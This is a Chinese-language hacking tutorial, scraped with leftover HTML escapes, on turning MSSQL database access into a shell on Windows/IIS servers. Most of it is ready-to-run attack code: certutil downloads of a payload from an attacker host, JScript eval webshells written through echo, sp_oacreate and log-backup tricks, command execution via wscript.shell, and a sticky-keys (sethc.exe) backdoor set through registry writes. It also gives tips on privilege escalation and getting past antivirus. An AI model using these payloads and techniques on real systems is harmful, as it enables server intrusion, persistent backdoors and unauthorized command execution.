MSSQL GetShell方法详解<\/h1>

0x01 环境准备<\/h2>
Windows 2008 + MSSQL 2008 + IIS7<\/li>
Windows 2003 + MSSQL 2005 + IIS6<\/li>
权限差异：
MSSQL 2005及以下：SYSTEM权限<\/li>
MSSQL 2008及以上：通常为NETWORK SERVICE权限（安装时可能设置为Administrator）<\/li> <\/ul> <\/li> <\/ul>
0x02 通过命令下载文件获取Shell<\/h2>

使用certutil下载文件<\/h3>
通过sqlmap获取os-shell执行权限<\/li>
使用certutil下载文件：
certutil.exe -urlcache -split -f http:\/\/[IP]:[PORT]\/artifact.exe
<\/span><\/span><\/code><\/pre><\/li>
若拒绝访问，可在可写目录创建文件夹后下载<\/li>
<\/ol>
注意事项<\/h3>

执行可能超时，sqlmap会重复执行命令<\/li>
若为NETWORK SERVICE权限，可使用JuicyPotato提权<\/li>
<\/ul>
0x03 绝对路径写Webshell<\/h2>
查找绝对路径方法<\/h3>
1. 报错信息<\/h4>

需要管理员配置过web.config：
<configuration><\/span>
<\/span><\/span>    <system.web><\/span>
<\/span><\/span>        <customErrors<\/span> mode=<\/span>"Off"<\/span>\/><\/span>
<\/span><\/span>    <\/system.web><\/span>
<\/span><\/span><\/configuration><\/span>
<\/span><\/span><\/code><\/pre><\/li>
<\/ul>
2. 读取配置文件<\/h4>

IIS6: C:\Windows\system32\inetsrv\metabase.xml<\/code><\/li>
IIS7: C:\Windows\System32\inetsrv\config\applicationHost.config<\/code><\/li>
使用命令：type [配置文件路径]<\/code><\/li>
<\/ul>
3. cmd命令搜索文件<\/h4>
dir<\/span>\/s\/b c:\index.aspx
<\/span><\/span><\/code><\/pre>参数说明：<\/p>

\/s<\/code> - 列出所有子目录<\/li>
\/b<\/code> - 只显示路径和文件名<\/li>
<\/ul>
4. 找旁站路径<\/h4>

通过读取httpd.conf等配置文件查找旁站路径<\/li>
<\/ul>
5. 使用xp_dirtree<\/h4>
xp_dirtree 'c:\'<\/span>, 1<\/span>, 1<\/span>
<\/span><\/span><\/code><\/pre>参数：<\/p>

要列的目录<\/li>
是否列出子目录（1=是）<\/li>
是否列出文件（1=是）<\/li>
<\/ol>
使用方法：<\/p>
create<\/span> table<\/span> dir(subdirectory varchar(255<\/span>),depth int, filee int);
<\/span><\/span>insert<\/span> into<\/span> dir(subdirectory,depth,filee) exec<\/span> xp_dirtree 'c:\'<\/span>,1<\/span>,1<\/span>
<\/span><\/span><\/code><\/pre>6. 使用xp_subdirs<\/h4>
xp_subdirs 'c:\'<\/span>
<\/span><\/span><\/code><\/pre>(只能列出目录，不能列出文件)<\/p>
7. 修改404页面<\/h4>
适用于2005或高权限2008：<\/p>
exec<\/span> sp_configure 'show advanced options'<\/span>, 1<\/span>;RECONFIGURE
<\/span><\/span>exec<\/span> sp_configure 'Ole Automation Procedures'<\/span>,1<\/span>;RECONFIGURE
<\/span><\/span>declare<\/span> @<\/span>o int
<\/span><\/span>exec<\/span> sp_oacreate 'scripting.filesystemobject'<\/span>, @<\/span>o out<\/span>
<\/span><\/span>exec<\/span> sp_oamethod @<\/span>o, 'copyfile'<\/span>,null<\/span>,'C:\Windows\System32\inetsrv\config\applicationHost.config'<\/span>,'C:\inetpub\custerr\zh-CN\404.htm'<\/span>;
<\/span><\/span><\/code><\/pre>8. 爆破路径<\/h4>

默认路径：C:\inetpub\wwwroot\<\/code><\/li>
<\/ul>
写入Webshell<\/h3>
echo ^<%@<\/span> Page Language<\/span>=<\/span>"Jscript"<\/span>%^>^<%<\/span>Response.Write<\/span>(eval(Request.Item["z"<\/span>],"unsafe"<\/span>));%^><\/span> ><\/span> C<\/span>:\<\/span>inetpub\<\/span>wwwroot\<\/span>shell.aspx
<\/span><\/span><\/code><\/pre>(注意<>需要转义)<\/p>
0x04 sp_oacreate写入Webshell<\/h2>
启用sp_oacreate<\/h3>
exec<\/span> sp_configure 'show advanced options'<\/span>, 1<\/span>;RECONFIGURE
<\/span><\/span>exec<\/span> sp_configure 'Ole Automation Procedures'<\/span>,1<\/span>;RECONFIGURE
<\/span><\/span><\/code><\/pre>执行命令示例<\/h3>
declare<\/span> @<\/span>o int;
<\/span><\/span>exec<\/span> sp_oacreate 'wscript.shell'<\/span>,@<\/span>o out<\/span>;
<\/span><\/span>exec<\/span> sp_oamethod @<\/span>o,'run'<\/span>,null<\/span>,'cmd \/c mkdir c:\temp'<\/span>;
<\/span><\/span>exec<\/span> sp_oamethod @<\/span>o,'run'<\/span>,null<\/span>,'cmd \/c "net user" > c:\temp\user.txt'<\/span>;
<\/span><\/span>create<\/span> table<\/span> cmd_output (output<\/span> text);
<\/span><\/span>BULK INSERT<\/span> cmd_output FROM<\/span> 'c:\temp\user.txt'<\/span> WITH<\/span> (FIELDTERMINATOR=<\/span>'n'<\/span>,ROWTERMINATOR =<\/span> 'nn'<\/span>)
<\/span><\/span>select<\/span> *<\/span> from<\/span> cmd_output
<\/span><\/span><\/code><\/pre>写入并执行VBS脚本<\/h3>
declare<\/span> @<\/span>f int,@<\/span>g<\/span> int
<\/span><\/span>exec<\/span> sp_oacreate 'Scripting.FileSystemObject'<\/span>,@<\/span>f output<\/span>
<\/span><\/span>EXEC<\/span> SP_OAMETHOD @<\/span>f,'CreateTextFile'<\/span>,@<\/span>f OUTPUT<\/span>,'c:\inetpub\wwwroot\cmd.vbs'<\/span>,1<\/span>
<\/span><\/span>EXEC<\/span> sp_oamethod @<\/span>f,'WriteLine'<\/span>,null<\/span>,'Set objShell = CreateObject("Shell.Application")
<\/span><\/span><\/span>objShell.ShellExecute "cmd", "cmd \/c whoami>c:\whoami.txt", "", "runas",1'<\/span>
<\/span><\/span>declare<\/span> @<\/span>o int
<\/span><\/span>exec<\/span> sp_oacreate 'Shell.Application'<\/span>, @<\/span>o out<\/span>
<\/span><\/span>exec<\/span> sp_oamethod @<\/span>o,'ShellExecute'<\/span>,null<\/span>,'c:\inetpub\wwwroot\cmd.vbs'<\/span>, ''<\/span>, 'c:\'<\/span>, ''<\/span>, 0<\/span>
<\/span><\/span><\/code><\/pre>直接写入Webshell<\/h3>
declare<\/span> @<\/span>f int,@<\/span>g<\/span> int
<\/span><\/span>exec<\/span> sp_oacreate 'Scripting.FileSystemObject'<\/span>,@<\/span>f output<\/span>
<\/span><\/span>EXEC<\/span> SP_OAMETHOD @<\/span>f,'CreateTextFile'<\/span>,@<\/span>f OUTPUT<\/span>,'c:\inetpub\wwwroot\shell.aspx'<\/span>,1<\/span>
<\/span><\/span>EXEC<\/span> sp_oamethod @<\/span>f,'WriteLine'<\/span>,null<\/span>,'<%@ Page Language="Jscript"%><%var a = "un";var b = "safe";Response.Write(eval(Request.Item["z"],a+b));%>'<\/span>
<\/span><\/span><\/code><\/pre>0x05 备份GetShell<\/h2>
LOG备份方法（适用于2005和2008）<\/h3>
alter<\/span> database<\/span> testdb set<\/span> RECOVERY FULL<\/span> 
<\/span><\/span>backup database<\/span> testdb to<\/span> disk =<\/span> 'c:\bak.bak'<\/span>
<\/span><\/span>create<\/span> table<\/span> cmd (a image) 
<\/span><\/span>backup log testdb to<\/span> disk =<\/span> 'c:\aaa.bak'<\/span> with<\/span> init 
<\/span><\/span>insert<\/span> into<\/span> cmd (a) values<\/span> (0<\/span>x3C25657865637574652872657175657374282261222929253E) 
<\/span><\/span>backup log testdb to<\/span> disk =<\/span> 'C:\inetpub\wwwroot\shell.asp'<\/span>
<\/span><\/span><\/code><\/pre>0x06 劫持粘滞键（适用于2005+开放3389）<\/h2>
使用sp_oacreate复制文件<\/h3>
exec<\/span> sp_configure 'show advanced options'<\/span>, 1<\/span>;RECONFIGURE
<\/span><\/span>exec<\/span> sp_configure 'Ole Automation Procedures'<\/span>,1<\/span>;RECONFIGURE
<\/span><\/span>declare<\/span> @<\/span>o int
<\/span><\/span>exec<\/span> sp_oacreate 'scripting.filesystemobject'<\/span>, @<\/span>o out<\/span>
<\/span><\/span>exec<\/span> sp_oamethod @<\/span>o, 'copyfile'<\/span>,null<\/span>,'c:\windows\system32\cmd.exe'<\/span>,'c:\windows\system32\sethc.exe'<\/span>;
<\/span><\/span><\/code><\/pre>修改注册表<\/h3>
exec<\/span> xp_regwrite 'HKEY_LOCAL_MACHINE'<\/span>,'SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Image File Execution Options\sethc.EXE'<\/span>,'Debugger'<\/span>,'REG_SZ'<\/span>,'c:\windows\system32\cmd.exe'<\/span>;
<\/span><\/span><\/code><\/pre>0x07 注意事项<\/h2>

杀毒软件（如360）会拦截大部分执行命令的方法<\/li>
MSSQL解释器特性：正确语句后可直接接其他语句执行，不一定需要分号分隔<\/li>
使用sqlmap时：

Linux环境下可Ctrl+c停止目录遍历并保持os-shell<\/li>
Windows环境下直接退出可能导致后续os-shell不可用<\/li>
建议使用q命令正常退出os-shell<\/li>
目录遍历时设置较长超时：--timeout=100<\/code><\/li>
<\/ul>
<\/li>
<\/ol>